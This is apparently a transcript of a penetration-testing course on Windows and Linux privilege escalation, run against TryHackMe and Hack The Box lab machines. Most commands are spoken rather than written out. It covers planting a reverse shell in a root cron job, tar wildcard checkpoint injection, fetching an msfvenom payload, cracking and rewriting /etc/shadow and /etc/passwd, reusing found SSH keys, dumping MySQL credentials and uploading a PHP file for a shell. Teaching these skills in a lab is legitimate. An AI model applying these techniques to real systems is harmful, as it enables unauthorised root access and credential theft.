There's a bunch of different ways you can run this, and if you're really struggling on the box, you can get really creative and just type in PESS and just see what you can find through using these. This is going to go out and search all. That's what this means. This little star is going to search all the text files for the word password. And sometimes it is going to bring down a lot, and you're just going to have to look through those files and see what you can find. One other thing that is worth mentioning, I think I mentioned it before, is whenever you get on a Windows box, you should see if you can access a config file, or a Linux box, you should see if you can access a config file, because a lot of times people will store passwords in those config files. And one more thing to be aware of when you're looking for passwords is the SAM file. And you can go out whenever you're looking for the SAM file. I can never remember where it is, but you can go out to Google and just type in Windows SAM file location, and it'll tell you where the SAM file is. Because if you can get in that SAM file, you can read that SAM file, or you can dump the SAM file. You can get hashes and passwords to users, and then you can use those to access higher privileged users on the box. So be aware of that. Save those in your notes, and remember to look for those when you get onto a Windows machine. And with that, I will see you in the next video. One thing that is helpful beyond just searching in these files here is to come down here, and a really helpful place to search for passwords is right here. Using this, searching in the registry. I have cracked machines with this before in the past. So you just come in here, you can paste this in, and you hit enter, and it will start pulling stuff down. It's going to tell you this reg_sc, and you can begin to look. This is where the passwords will be stored, if there are any stored passwords. These just tell us these are default passwords, and unfortunately I don't see any. I've never actually ran this on this machine before, so I've never actually looked at it. And sometimes this will have passwords and users in here, and it's always one to look at and to see what is in here. It's always one to go ahead and run and check to see if there are any stored passwords in here. So with that, I will see you in the next video. Okay, we're going to be doing some network enumeration in this portion of the course. The first thing we need to be aware of is the system info. And in here we have a lot of useful information. So we get the name, the host name, and the OS version. This is going to be important for, or the OS name, the OS version, this one right here, is going to be important when looking for kernel exploits. We have gone over a few tools that will help us find some of these kernel exploits due to the OS version, but a manual way to do it is to come in here, to take the OS version, to go out, to copy it and put it in Google, and then to read and see if there's any exploits out there. And it's helpful to know what the OS version is, especially when you're trying to run a kernel exploit, because if you're trying to run one that is newer than the version you're currently going up against, then it's probably not going to work, but it might if there's not any patches. So it's something to be aware of and something to research and to go out and to look and see what you can figure out about the OS version. We also see the name, the registered name of the machine, which I think is also a user on this machine as well. And then we can continue on and we can see the system, we can see the architecture of the machine. This is also important because if you're going to be running WinPs on here, you have to have the right version. Some exploits, so if you're running a kernel exploit, I have come across this before where a kernel exploit is made for, I think it was an x64, and I needed to change it. I couldn't get the exploit to work. And I just was banging my head up against the wall, unable to figure out what was going on. And the issue was I didn't have it set to the right architecture. And it's something to always be aware of. Also, if you're in Metasploit and you're trying to run an exploit, then you need to make sure that you know what the architecture is and make sure that you are using the right exploit set up with the right architecture for that exploit or that privilege escalation to work. And then we can see the domain. If you're on a Windows, if you already have code execution on a Windows machine, this is not as big of a deal, but whenever you're looking for an Active Directory exploit, this is always something to go for and something to look at. And we will cover a little bit more of how to use this in the future, but these are just some things to be aware of and to be on the lookout for when you first get on a box. I usually will run a system info as well as an IP config just to see what is going on within this box. Okay, so with that, we will continue with our network enumeration in the next video. All right, we are going to continue with our network enumeration. When we get onto a box, probably the very first thing I always run is a who am I. It'll tell you if you even need to start looking for a privilege escalation. If it says you are in the authority system, then you know you don't need to worry about privilege escalation. However, in this case, we are not, and it tells us who we are. And then one of the very next things we can run is a who am I /priv, and this will tell us the privileges we have. This is something to check, especially in CTFs or certifications or older boxes, something that hasn't been updated in a while, because one of the popular exploits right here is the potato attacks, and they come through the SE impersonate privilege right here. If it is enabled, you can always come here and try potato attacks and see if you can get these to work. So this who am I /priv is really helpful because you're going to see whether or not this is enabled, the SE impersonate privilege, and if it is, you should be thinking potato attacks. And we're going to cover a little bit of the potato attacks later, but it wouldn't be a bad idea to go out and read about the potato attacks and how they work, because we're not going to cover them really in depth. We're just going to see one of the potato attacks later on in this course, but you're going to see us run the who am I /priv, and then we're going to look at this to see if it's enabled, and then we'll go out and pick one of the potato attacks to run against a box later. So the who am I /priv is always something to look at, and then we have the who am I /groups. This is a helpful one to run, especially on Active Directory, because it'll tell you what group you're a part of, it'll tell you what groups there are, and you can also run a net user and you can see the users on the box. And so we have administrator, we have the Babis, and then the guest user. And this will be helpful when you're in Active Directory because you can enumerate users, find out users that you may be able to move to laterally, and eventually try to compromise the domain controller. So the users or the net users is really helpful, especially in Active Directory. And so is the groups, because if we are just a low level user in one of these groups over here, our goal is to get into one of these authority groups. We want to make it into a high level user and eventually compromise the domain controller. So in Active Directory, these are going to be really helpful to enumerate users and groups. We're actually going to go ahead and stop this video here, and we'll continue on enumerating the network in the next video. All right, we're going to go over a few Windows privilege escalation tools. These will help us once we have our initial shell and we have a foothold on the box. This first one is kind of old, but it's one that I really like. It's Windows Exploit Suggester. So if you're running an older box, this is one to always run. We're actually going to check this one out pretty quickly. So we'll install it later because it's kind of a little bit of a walkthrough. And then we're going to run it, and we're going to see exactly how this works. It's going to help us find some kernel exploits, and so Windows Exploit Suggester is one that we're going to be going over. We're also going to go over WinPs. This is one of my favorites when it works, and you will see what I mean when I say when it works, because it doesn't always run. So I really like this tool, but the best place to remember about anything on this page without having to come back and reference this video is to go right here to the release page. This tool is not like WinPs or like LinPs. It doesn't just automatically run regularly without any problems. It's going to have the right architecture, and you're going to have the right box to get it to run on. I like to run WinPs any and hope for the best. But if not, I will check the architecture, pull over the right one, and still try to get it to run. And still, sometimes it won't run, and you'll have to run the WinBat file, the WinPs bat, and then you can sometimes get that to run, and sometimes WinPs just doesn't work at all. That's why it's helpful to know the manual enumeration, because sometimes that's what you're going to be stuck with. And these tools are just there to help you get the job done a little quicker, but you still have to know what you're looking at. And then we have JAWS. This is a PowerShell script, and it is going to be another one that we're going to see. It stands for just another Windows enumeration script. This one I don't use as much, but I will use it occasionally. This one, if I'm going to run a PowerShell script, this is the one I usually go for, which is PowerUp. And we're going to see this later on in the course. We're going to pull the PowerUp file over to our Windows box from our Kali machine, and we're going to go ahead and run it and see what comes back. A couple others that are worth mentioning that we are not going to see right away because they're going to be used in the Active Directory portion of the course is Mimikatz. It is one that is going to help us with further enumeration once we're on a Windows box. We might see a couple others, but these are just the ones that I know we're going to see, and to give you a heads up that I have now mentioned them, so when we see them and you hear me say WinPs or LinPs, you're going to be able to go, okay, this is a privilege escalation script. It's going to help us figure out how we can escalate this box. Or if I say, let's go ahead and plug this into Windows Exploit Suggester, you're going to know what's going on. We're looking for kernel exploits and how to go from there. So with that, let's go ahead and jump into some kernel exploits. Okay, a little update video here. About halfway through this course, I decided to switch from an old 2021 box to a new 2022 box from Kali Linux. And one of the things I noticed when going back and editing the videos is that when we do file transfers, if you're on an older box from like the end of 2021, really at the switch of 2022, then This is how you'll set up a simple server, and you'll see me do this for a little while throughout the network portion of this course. But then I switched to a new Kali Linux box, which runs Python 3 by default, and the older ones in 2021 ran Python 2 by default. And so I had to specify right here this Python 2 when I would run this simple server. And we'll need to use the simple servers to transfer files back and forth between Linux machines. So you're going to be seeing this. And if you're having any trouble running one of these commands, just try running sudo python and then the simple server. And if that doesn't work, then you can try Python 2. And you can always specify if you need to. You can also go sudo python 3 to specify Python 3. So with that, this is how we're going to be transferring files. If you're having trouble with one, just try the other and it should work. All right, we are here at TryHackMe. TryHackMe is a great place to go to practice a lot of your skills. They actually have free courses and free places to practice. We're actually going to come back here for the buffer overflow as well. But this is a great place to go and practice your Windows privilege escalation as well as your Linux privilege escalation. I've decided to come here for the Linux privilege escalation because we can pretty much do everything in one place, and we can look at some of these scans and we can see just exactly how this is going to work. So we're going to walk through quite a few of these. Just so you get an idea, Linux privilege escalation, in my opinion, is easier than Windows, but there are those who I highly respect who are very great penetration testers who disagree with me and say Windows escalation is way easier and it is their favorite. So I guess that it's just preference. But we'll go ahead and we're going to look at a couple of different tools. So the first one I want to show you is going to be LinPs. So this is a brother to, or sister, however you want to look at it, to WinPs. So we'll just Google LinPs and it'll bring you to this page. It'll be the first one. So LinPs right here on GitHub. And it's the same as before. What you do is you're going to scroll down and you're going to go to the release page. You'll click on this. I just grabbed the first one, so just click on this. You can click download and it will save to your downloads, and then what you'll do is you can just move it from your downloads by typing in copy and then the location, which is going to be your home. So it'd look like this. If I wanted to copy it to my desktop, I would go copy home, the machine, the downloads, and then the file, which is linps, and then I just put period to copy it to my current directory. Or if I wanted to copy it to a different location, I would put the full path in there as well. And so you'll go ahead and copy that to your tools folder, which I have already gone ahead and done. It is right here. And so you'll want that there. And then the other one we want is Lin Enum. And we're going to look at Lin Enum. I don't use this really that often, but I like to have it. And it's one I want to show because it's not going to highlight things for us, and it'll be easier for us to walk through what we're looking at without LinPs just giving us all of the answers. So we're going to go ahead and grab Lin Enum as well. You'll go ahead and you'll just type in, I typed straight into the URL, but this is the URL where you're going to go. You'll just go ahead and type in Lin Enum, and then you can type in this right here, and it'll pull you up this GitHub page. So you're going to want to go ahead and click linenum.sh. You can right click it and go copy link location, or you can come in here and save things the way I do. I go into raw, I highlight it all with Command A, I copy with Command C, and then I gedit a page over here, and then I paste it in. And so that's how you're going to get those. And then we're going to go back over to TryHackMe, and we're going to SSH into this box. I'll have already done that, and we will begin looking at some of the privilege escalation ways in Linux. All right, so we are going to be talking about cron jobs. These are files that get executed every 1 minute, every 5 minutes, every day or week. I already went ahead and ran lin enum and linps. And so here's the output for linenum. And we actually come up here, it actually starts up here. So it'll tell us what files are getting run daily and which ones are hourly and monthly. And then down here, it actually tells us like we have the ability to run this shell bin bash. Well, this isn't bash, this is bin sh here through the home user path. And so this is in our path, we have the ability to write to it, and it'll tell us down here what each one of these stars mean. So you have minute, hour, day, month, or day of week. So we have this right here. These all stars means that it runs every minute, every hour, and so on and so forth. So both of these files here. So this one is going to be in a path, and this one is just a file. So we should be able to find the location of this file and then just overwrite it and be able to get a reverse shell through this because it's being run as root. And so when root runs a file and we put in a reverse shell, when root runs the file, we'll be able to set up a listener, and root will reach out and we'll be able to get a reverse shell on another tab. So that is lin enum. We can come down to linps right here, and we can actually see it lights it up for us. It says this path right here is vulnerable. These are being run as root, and it's happening all the time. Every minute we have the opportunity to overwrite this file. So what we'll do is we'll see if we can find this file location. So we'll go locate, and then we'll paste, and we'll type enter, and it tells us that the file is right here. So we should be able to just go to nano and then paste this in. And this is what is being run right here. So it says bin bash, and then it's just echoing the date, and then it's going into nowhere. So we can actually just come in here, and we could leave that actually. I was gonna say we could delete it, or we could leave it. And what we want to do is put a reverse shell in here. So I shared this with you earlier. This is a place to go, pin test monkey, and you can get reverse shells. We can just come in here because this is running a bash script, or a bin sh script is a bash. Bin bash, you can come in here and you can paste in this bash script, and we'll go ahead and use the famous port 4444. Got one too many there. And then we just put in our IP address, and I think mine is 10.2.42.96. And so that looks okay. Come over here, we will set up a netcat listener on port 4444, and we will go ahead and save this out. And when it is executed, we will get a reverse shell over here. So we'll go ahead and wait for this to reach back to us, and I will restart the video. It shouldn't be more than a minute. Okay, and it has reached back out, and we have our root shell. So what happens essentially one more time is the server is going through and it is running these jobs every week, every month, every hour, and these ones every minute. And so because this is being run every minute or every 5 minutes, if you ever are doing a capture the flag or a certification or really any box and you see every minute or 5 minutes, you can be thinking this is probably going to be your way in, especially if linps lights it up for you. So what happens is this is being run as root, and when root runs this file and it runs our reverse shell right here, we'll go ahead and open this back up. When it runs this, essentially what it's saying is root wants to reach out to this IP address on this port and offer up a shell, a bash shell. And so when this happens, we come over here and we have this shell come through, and it comes through as root because root executed our file. And with that, we'll see you in the next cron job video. All right, the next video is going to be covering the cron job wildcards, and these are ones that I see a whole lot less, but it is one that you should be aware of nonetheless. And one helpful tool that I forgot to mention to you guys, it'll be linked over in the course resources of this video, is right here, GTFO bins. So you can just delete this and save GTFO bins. It is a really helpful place to go, especially when you're trying to do privilege escalation. And in this specific one, it actually tells us that we can break out of a restricted environment by spawning an interactive shell. And so we saw from our linps and our lin enum that we have this file running right here. And so what we can do is actually come in here, we can copy this. I'd have a space there at the end. We can copy this and we can cat this out so we can see what's going on. And this is where I come up with the tar so that we can go and check this out on GTFO bins, and it will actually tell us what we need to run in order to get this to work. So what we're going to do is we are going to come back here and we're going to need a reverse shell payload. So one of the things that I have showed you earlier is when we make these, we make them right here with MSF Venom. And so we can go ahead and I'll go ahead and run that. So that way we have it. But what you need to know when you are making one of these, and where I got this is right here. We go into our Linux, and because this is a Linux box and we're making it a payload with MSF Venom, we need to just copy this, and then you change your port, you change your IP address, and then you set up the shell you want. But what's different here versus the web payloads is we actually need to have the right architecture. And if you saw, we're running an x64. If you try and run this as an x68, it is not going to work. And the way you find that is by typing in a uname-m. You type in uname-m, and it'll tell us this x8664. And if you didn't know what this was, you could just copy this, paste it into Google, and it will tell you. But for our sake, we're going to be needing to run x64, not x86. So that's how we come up with the type of payload that we're going to be generating. And I went ahead and already pre-filled out everything so that we would have it. And now what we'll do is we need to transfer this over to our vulnerable server. So we'll come over here. We are in the home directory and we're going to run a wget, and we're going to run it on my IP address, http //10 to 42 and 96, and then we're going to slash, and we're going to call this shell.elf, and we will need to start up a server so that we can transfer this file, and we're going to do that with sudo python 2 -m simple http server, and we're going to put that on port 80, and we're going to type in the password. And now we have this up and running. We're going to go ahead and get this. And it has grabbed it. And so what we'll need to do now is make this executable. And we need to do that with a chmod. And then we can go +x. And then we can just type in the payload right there. And now what we also are going to have to do is we're going to have to make a checkpoint for the server to know where to look in the path for this file. So we'll go touch, and then we're going to /home user, and then we'll go -- checkpoint equals 1. Make sure that looks right. It does. And then we'll go touch /home /user checkpoint, spelled that wrong, checkpoint /action equals, and this is to execute our file, and that looks okay. So now what we're going to do is we're going to have to come back over here. We'll close out of that. We can set up the netcat listener that we had running earlier on port 444, because that's the port we set it up on. And now this should execute, and I'll bring you back whenever it has, oh, it already has come back. And there is our shell. That is the cron job wildcard. It's a little confusing, but just watch this a few times and then maybe we'll practice it later on in this course and it won't be so confusing. And with that, I'll see you in the next lecture. Okay, so I have gone ahead and ran Lin Enum and Lin P's on our practice box here in TryHackMe. And what we're going to do now is we're going to go ahead and look at the Etsy file and the Etsy shadow files. And what these are the files that contain the users and the passwords. So on Lin Enum, it looks like this. And we have the password file here, and I think below this is the shadow file, yes. And it says we can read this file. We should not be able to read this really ever. And usually you're not going to be able to, even in CTFs, you're not going to be able to read this, only if it's really easy. But occasionally you'll be able to see the Etsy passwd file, but you won't be able to edit it. Lin Enum doesn't tell us whether or not we can edit this file. It just says here you can read it. But if you go to and run linps, which is the tool I usually go to, it's usually my go-to, it does tell us right here. It says interesting files owned by me or writable to everyone. So this is writable to everyone. And then it tells us right here, this Etsy passwd, which is not supposed to be writable to us. So we can go ahead and write to this file if we want to. And we are going to get there. We're just not going to tackle that right at this second. So with this, we know that we can read these files, and where did you go? We can read these files and we are able to edit them. So what we're going to do first is we're going to go ahead and we're going to try and crack the password, since we can read the hash here for the root password. And so if you remember with hashcat, what you do, we're going to use hashcat, but what we're going to do is we're going to go ahead and copy everything in between this colon and this colon. So we'll go ahead and copy that, and we're going to go ahead and move over to our tools. Okay, so you can move into your tools, or you can go ahead and make a new directory, and we'll make a new directory and we'll just call it cracking, and then we'll cd into cracking. And then what we're going to use as our word list is a word list. We're going to go locate rocku.txt, and it's right here. And so for you to unzip this, what you're going to have to do is you're going to copy this, you're going to cd over here, and you're going to paste, and you're going to hit enter. We'll go ahead, and we don't need the whole thing, we need just this. Actually, we'll just up arrow and delete it. So what you're going to do is you're going to come over here to your word list. If you ls, I've already unzipped this file, but you're going to need to unzip it anyway. And what you're going to have to do is, it didn't, oh, my bad. It already took me over there. So I already have it unzipped here, but you're going to have to go ahead and cd to wherever you have it, to wherever you have this gz file, and you're going to have to unzip it, and you're going to run this right here. You'll have to run sudo gzip -d, and then it'll be rocku.txt.gz. And so wherever this file is located, and you'll have to unzip it, and then you're going to copy it over to your file wherever you want to keep it. So we'll go and cd into this crack. Oh, it's not in the desktop. cd ... cracking. So in here, and then you can go ahead and copy wherever you have that file. So I actually have it stored in my tools, cd desktop tools, and right here I have this file right here. So that is going to have our passwords that we're going to be running Hashcat with. It's going to be our word list. And one thing else that we'll need that I got sidetracked, we'll copy this hash and we're going to come over here and we'll gedit hash.txt, and then you're just going to enter and you're going to paste it in here. Now, the way we're going to crack this is going to be with Hashcat. And this is what the syntax is going to look like, and I'll just walk through it real quick. This -m is the method you're going to be using to crack it. This is going to be where your hash is located, and this is where your file, your word list, is located. And so Hashcat, the way I come up with where this is you look to see this $6. You can copy that, and then I like to go out to Google. I type in Hashcat example hash, and then I click on that first one, and then I usually hit command find. I paste this in, okay, or we can go $6, and it will take us to the place where we need to be. I did not use a $6, and then it'll tell us right here 1800. This is what we're going to need to use, and we're going to use some of these other methods later, but we're going to go ahead and run it like this. We'll hit enter and it will run, and it might take a second, especially if you don't have a lot of extra RAM or CPUs on your computer, because Hashcat is pretty intense when it runs. So we'll go ahead and let this run, and I'll bring us back once it has cracked the password. Okay, Hashcat has finished running and it has cracked the password. It is right here. Here's our hash. Here is our password, password 123. So what we'll do is we'll come back over here, and because that was root's password that we cracked, we can come over here and we can switch users to root, and then we'll paste in that password, and we are now root. So that is a weak Etsy shadow file setting, and if you're able to read those hashes, you can crack those passwords. And just so you know, you will find hashes elsewhere beyond that. So Hashcat is something you're going to want to know how to run. You can also run John. Maybe we'll use that tool a little later for hash cracking, but that is how we crack a hash that we found in the Etsy shadow, and we're going to continue on looking at how we can exploit these in the coming videos. Okay, so we're going to go ahead and cover the Etsy shadow weak file permissions as well as the Etsy passwd in this one video, because it's basically going to be the same exploit with just a little different way of generating a new password. Because we have the ability to edit these files, we can just go ahead and put in our own password, and then we can use that password to log in or switch users. So what we'll do is we can go ahead and we can nano our Etsy shadow file. So we'll go nano, and then we'll go Etsy shadow, and then it gives us the opportunity to come in here and edit these files. So what we'll do is we can, since we already have this copied and saved, we can go ahead and delete this, and just know that in a real live pen test, you would never do this ever. You would never delete this password. You might make a backup of the Etsy shadow, then edit it, and just so you have that there. But I would just make a new user, which we're going to do here in a second. So we've now deleted that, and so what we'll do is we can come over here and we can type in make passwd, and because we saw the version we're using is the SHA-512, we're going to go im, and then we're going to go SHA, and then it is going to be 512, and then you can type in whatever you want here. So we'll just type in pass, and then we can hit enter, and now it has generated for us a new password. So what we'll do is we'll copy this, and we're going to come back over here and we're going to paste it in, and now we have now changed this password. So we can exit this and we will save it, and we're going to close out of here. And now what we can do is we can go ahead and switch users to root. We can type in our new pass, and we are now root. Okay, so that's one way to go about this. The other way to go about it is you can actually edit the Etsy passwd file. So we can nano, basically the same thing we just did, Etsy passwd, and we're going to do this one a little different. So what we're going to do is we're not going to try and put a password in here. What we'll do is we'll just copy this. This is how I would actually go about doing this. And then you can come down here and you can paste this in. And rather than edit this, what you'll see is like best practice is people will copy this entire file, they'll save it as a backup, and then they'll make a second passwd file and they'll put it in this location, and then they'll edit it. And then after the evaluation's over, they'll delete the Etsy password that they have made, their file that they've made, and then they'll just switch the backup back to the original. And then you don't have any extra users hanging out, you don't have anything messed up, and everything is exactly how it's supposed to be. So that's kind of just a heads up on different ways you're going to see this done. So we'll come back in here, and to make an Etsy passwd password, what you'll do is you'll go open SSL passwd, and then we're going to change the password. We'll actually change it here to password I don't know, we'll change it to password 7. So we'll go ahead and generate this, and this is going to be our new password. We'll come back over here, and we're going to need to change the name of root to root2 because we already have a root user. And where this X is, we're going to paste in our new password, and we're going to do the same thing. We're going to hit Control X, we're going to save it, and then we're going to go ahead and hit enter. And then we're going to go switch users to root 2, which is the new one, to the new one we made. Not sure why that didn't work. Oh, I put the 2 in the wrong spot. Okay, well, we'll go ahead and leave that, and we'll go switch users to root 2 like that. And then we're going to type in password 7. And we are now the root user. So this is how you take advantage of weak file permissions. You will see these in the future. They're not super uncommon in CTFs, and so just be aware of that. And sometimes you will have a user in a live situation that does have access to these files, and this is how you're going to go ahead and take advantage of them. If this has been a little confusing to you, don't worry about that too much. We are going to have the opportunity here at the end of this section, after we cover the SUID privilege escalation, to practice this exact technique in editing the Etsy passwd file. And so we're going to have the opportunity for you to get hands-on within Hack the Box under the box named Bank, and you will be able to practice this. If you're too excited to practice this, you can go ahead and launch the box Bank on Hack the Box, and you can skip forward and practice this, or you can go ahead and continue on with the next video. All right, there is one way of privilege escalation that I want to show you guys that you will see in the future, one that you'll need to know, and that is through MySQL. So we actually have MySQL here. One thing to always check is your history. So when you come onto a box, you can type in history, and we actually see we have MySQL, some localhost, user, password 123. So what you can do is type it in this way. So we just use MySQL-root, and we are here in the MySQL database. And so what we'll do is go show databases, and you can save these in your notes just pretty much just like this. And then we'll use MySQL, or we'll use whatever database seems interesting. And then we can show tables. Forgot my semicolon there. So if you hit this arrow, it's because you need a semicolon to close off your SQL query. And then you can look through here, and you can go through all these files and see what looks interesting to you. This looks interesting, the databases, but we're going to go into the users probably 90% of the time or more. You're going to want to go into the users, and so you can actually come in here and we'll just select all, and some of this should look familiar from the SQL injection. So select all from user. And this actually gives us a very non-pretty version of the user and the password. There's another way to do this. We can go select, and then we'll go user, because remember we're looking for the user inside the table, which we actually have MySQL here. So we're going to be inside this user. So we're going to go select user, and then inside the user, I'll show you actually. It looks like this. Describe the user. So inside the user column, we want to find the user and the password. So what we're going to end up typing in is select the user and the password, and it's going to be from the table user. And then when we close that off and we hit enter, it makes it look a whole lot prettier. So sometimes you'll come in here and you'll have users and there'll be plain text passwords, but most of the time you're going to have something like this, and you're going to have to try and crack this password. But this is helpful. You're going to need to know it. You're going to come across it in the future. So remember that you can just type it in this way and you can have the very non-pretty version, or you can go about it and grab the passwords this way. I'd go ahead and save those SQL commands because you're going to need them in the future unless you know SQL really well, or you are up for the challenge of Googling in the future, or I guess you don't have to save them and you can just refer to this video. Either way, you're going to need to know that MySQL is something you need to look through in the future, and it's something you should always be ready to check. And I'll see you in the next video. Alright, in this video we're going to be going over some password hunting within Linux. This is something that some of the tools will cover for us, but it's always best to try and do it manually, especially if you get stuck at a dead end. And what we are going to do here is where it payloads all the things. What you'll do is you'll just come over here and you can copy these and you can just paste them straight into the box that you have a shell on, and you'll go ahead, paste it in, hit enter, and see if any files come back that look interesting. And we can go ahead, like some of these I'm pretty sure are actually available on this specific box. So what you'll do is you'll come over here, you just hit enter, and there they are, and you can actually, since these are just files, you can copy these and you can look and see what's inside of them. We are going to continue with this. These passwords, password hunting isn't the only thing you want to hunt for. This right here, these SSH keys, is definitely something that you need to be aware of. You will come across these in the future, but sometimes you're going to go like that, you'll paste it in and nothing's going to come back, and it's because the key is not actually named ID RSA. Most often that's what it's going to be called, but in this specific case it is actually called root underscore key. Yep, and there it is. And so we can actually go into where this file is, and we can cd /.ssh, and then the file should be right here. And what we'll do is we'll go chmod, and then we type in root key, and boy, I'm really struggling. Chmod, and then we need 600 so that we can use this key. And it says changing permissions of the key is not permitted. And we can go ahead and see if this will actually work anyway. We can go ssh-i root key, and then we'll go root at, and then we put in whatever IP address we're trying to SSH to. And in this case, it's 182.85. And we can go ahead and hit enter, and it says, do you want to fingerprint the box? We say yes, and we are root. Most of the time you are going to have to chmod 600 this. I'm not sure why that didn't work in this case, but that is how you would go about finding an ID RSA key and SSHing into the box. And you'll also want to remember and put in your notes or in your workflow password hunting. So with that, I will see you in the next video.
Okay, we are going to be talking about SUIDs, or the set UID. These are going to be something you're going to see, but they're not as straightforward as you might hope. Every single SUID I have ever come across has taken me more time than I think it should, because when you think about it and you go to GTFO bins, they look really easy, but every single time, every payload I've ever had to deal with has required some kind of modification or wasn't as straightforward as I had hoped. So these are something you're going to see in the future. So if you come over to payloads, all the things, the SUID is right here, and it tells us stands for set user ID. So the way we find these, LinPs and LinEnum both will find these, but you can also just come in here and you can copy, you can paste, and you just press enter and it will pull them down for us. So when you do this, it's going to look like this is what we're looking for, this S right here. We're looking for the sticky bit, and the sticky bit will be right here, and this is for the root user. So the root user has read write access, and then the S is enabled. So when we see something like a ch mod 777 and then file here, what's happening is they're changing this to read, write, execute all the way across for the root user, the group users, and the local user. So it would be a 7 here. This would be 4 bits. So if you saw something like this, 477, it would be, or a 444. What you'd be enabling is the read access, and then this would be the 2 bits, which is the write access, and you would see something like a 6. So like when we see the chmod 600, and then when you see all 7s, it would be read, write, execute all the way across. And so this is what we're looking for right here, this S. And then if it was a G UID, this would be a G, and this would be a T. But really what we're looking for right now is just the SUID. So we're looking for this one right here for this sticky bit. And what we'll do when you come across these, the way you enumerate these, LinPs is the best because it's going to just highlight it. It'll just highlight if one is vulnerable, but you might have to come across manual enumeration at some point, and LinPs isn't going to find it. So what you do when you enumerate these is eventually you'll get used to just seeing them and you'll know what's there. But you come over to GTFO bins, you will go to SUID, you will click on this, and then what you do is you just look for, you can go straight down and you go CHSH, and you can come down here and you can just look for CHSH, and then you can go, okay, that's not in here. We can look for sudo. I know sudo, plain sudo is not in here. I think sudo might be in here with an extension. Nope, see? So I still have to come here and look through these, and you will probably too. So we can go through and you can look for these, and then when you find one and you click on it, it will tell you how to carry out the execution for getting the file you need or to get root access. That is the SUID. We're going to go ahead and jump into a box that has an SUID in it, and you can go ahead and try and do the foothold on your own, and we can work on the privilege escalation together, or you can just follow along through the whole thing. I will see you in the next video. Okay, we are back, and we're going to be doing a box from Hack2Box. It is called Bank, and so you can go ahead and connect to Hack2Box and launch the box, and so you can connect and you can begin with your Nmap scan. But before we do, I want to challenge you guys to go ahead and try this box on your own. We've covered everything necessary to gain a foothold, and I just want to give you a tip. It's going to be a little more enumeration than what you might think when you first try to do your enumeration on this web server here. But before you go ahead and begin this box, there's one thing that I want to cover. Sometimes when you're doing hack the box machines, because we're working in a virtual environment, they label their web servers, not always, but sometimes, with a .htb. Normally, if you're out in the real world, you're going to come across .com, .net, .org, .gov, things like that. But because they have linked their web server to .htb, we're going to have to add that to our Etsy host file. And just a heads up, sometimes when you come out and you do boxes on your own and you're trying to work through hack the box on your own, when you come to a web page and you type in the IP address, normally when you need to add it to your Etsy host file is when it doesn't render. So usually it won't render anything. In this case, it's a little more tricky because the page actually does render. But what we'll have to do to go through and do this, we'll type in sudo gedit Etsy hosts, and you'll hit enter right here. And so we'll enter this, and we can type in our password. Okay, and here we are. And what you'll do is you'll type in 10.10.10.29 bank.htb, and you will save this. One thing to remember is when we have port 53 open is to go ahead and enumerate it. We actually did not cover the way to enumerate it that works on this box because we used, I believe, NS lookup and DNS recon. But what actually works on this box is a dig AXRF and then bank.htb, and then we enter at 10.10.10.29. And so when you run this, I'll actually go ahead and run it. To remember to add this into your notes. It's another way to enumerate port 53 and look for additional pages for us to add to our Etsy host file in this case, or to go out and look at. So if you wanted to be really thorough in your editing your Etsy host, you would go in and you would add bank.htb, chris.bank.htb, and you would even add this ns.bank.htb, and you just go through and add all of these. In this case, bank.htb will get us everything we need. But I thought I'd go ahead and show this to you so that you would be ready in the future and you wouldn't be caught off guard when you see it. So I want to go ahead and give you the challenge to try and solve this box on your own. We've covered the privilege escalation, we've covered the foothold already in this course, so I'll go ahead, and if you want, you can pause the video now and give this a try, or you can continue along with the video and do follow along. So we'll go ahead and we'll go bank.htb, and this brings us to a web page. And what you can do here is you can go ahead and try SQL injection. You can launch SQL map, which is something you can't use. Really, you shouldn't use it in a real world pen test. You definitely cannot use it on a bug bounty, and you're not allowed to use it in a lot of certifications. So we're not going to mess with it at this point. But what we're going to do is we're going to go ahead and start our GoBuster. And because we see this .php, what we're going to do is we're going to go with our GoBuster. And so we'll come over here, we'll just open up a new tab, we'll type GoBuster dash dir dash. We don't do a dash dir, we go dir dash u e / and we're going to type in bank.htb. Rather than the IP address, we're going to go with our word list. And this is where I think it gets a little tricky because you will have to use a different word list than what we've been using. You can go out and grab seclist. Word list, that's one I usually use when I'm trying to find directories. But in this case, I have one that I've actually modified. So we'll go ahead and go, I think it's going to be home. And then Kali, desktop, it's in tools, and I called it just wordlist.txt. So we'll go ahead and run that, and it's going to start pulling down directories for us and pages for us to go ahead and look at right away. We can go try and see what these render. Let's go ahead and see where this takes us. And we get this login page, which doesn't really look like it's going to do us any good. This is also at the bank login. Let's go ahead and delete this and see if we get anything different. And we hit this forbidden page.
One thing I have not tried, but I am curious now that we see this forbidden page, is to run this and to intercept this forward, put in a 200, okay, and see what happens. Okay, still tells us the same thing. So we'll come in here, we'll come back, and this right here looks interesting. So we'll go ahead and check this out. Bank transfer, that sounds like something you don't want someone to be able to see. That does not work. So what we'll do is maybe we do need to go over here and edit our Etsy host file. I thought we could get away without adding these in, so we'll go ahead and add this, paste, and we can add this, paste, and we'll go ahead and add this one, and we'll paste, and we'll save that, and we will try and come back here to this, and we will type in slash balance transfer. Okay, so we do need those in there. Now it brings us to this page with all of these files. And so what we can do is, I have come to pages before similar to this, not quite this extensive, but pretty extensive. And I went through and looked at every single one of these before I was able to find the vulnerability. But in our case, when we look at this, we can just see these are all pretty similar in size. And so they're going to be, what I would do is I would just look at one that's got a 583, a 584, and a 585, because it's probably going to be pretty much all the exact same files. And if you do look at one of those, it just turns out to be something that's encrypted. And here's one that is different. And so what we'll do is we'll go ahead and click on this. We will click Save File, and it will save to our downloads. So what we can do is CD over to our downloads, and then we'll cat this file out and see what is inside of it. And what we end up with is an email and a password. So remember that login page that we started at? We can try that. SSH is also open, and whenever I find credentials, that's probably where I'm going to go first, is I'm going to try and SSH into the box, and that is not going to work. So then we'll go back to our login page, and what we will do is just copy this, paste it in. We will copy this, and we will paste it in. We will submit. We will not save. So when we come to a web page, the first thing we automatically do is we start clicking around. That doesn't do us any good. And you click to see if you can do anything. This would be terrible if you found this in real life for whoever you're testing. And then we come over to support, and then we're brought to this page, and it has a file upload. And whenever you see file upload, you can automatically just start trying to upload different files. You can try documents, you can try PNGs. For us, we would want to try PHP, especially since it's running PHP, to see if we can get a reverse shell. So what we'll do is we can come in here, we can upload a file. So we can go ahead and try this, and we will want to turn on our interceptor, and we will type in test. Type in test. We'll choose the file. We'll go ahead and submit. We go forward. Oh, I just forwarded past it. Okay. It says it was a success, so that's a good thing. We can come in here and we'll just type in file this time, and we'll go file. We'll choose our file. We'll pick our GIF. We will turn intercept back on and hit submit, and we are brought to this page. We're going to send it to repeater, and we'll go ahead and send that on its way. And since 